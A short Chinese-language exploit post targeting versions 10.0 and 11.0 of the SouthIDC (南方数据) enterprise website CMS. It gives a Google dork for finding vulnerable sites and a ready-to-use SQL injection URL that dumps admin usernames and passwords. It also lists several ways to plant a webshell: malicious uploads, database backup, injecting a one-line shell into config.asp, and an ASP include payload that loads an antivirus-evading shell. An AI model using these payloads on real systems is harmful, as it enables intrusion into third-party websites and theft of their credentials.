南方数据企业0day

漏洞影响版本 v10.0 v11.0

关键字：inurl:”HomeMarket.asp”

默认后台：/admin

直接爆用户密码：

http://www.iick.blog/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
 

拿shell方法貌似有4种：
1、注册用户上传拿shell，这个比较直接，可以不进后台和在不知道用户名密码的情况下。
2、进后台备份数据库
3、在网站配置的版权信息里插入一句话，一句话地址写入到http://www.xxx.com/inc/config.asp
3.1、另外一种插配置：
第一步  网站配置添加TXT

保存成功后
第2步传一个TXT小马

小马要免杀的
第3步  网站配置 利用包含得到小马
"%><!--#include file="201331420455473.txt "--><%'
填入网站配置
4、编辑器：/admin/southidceditor/admin_style.asp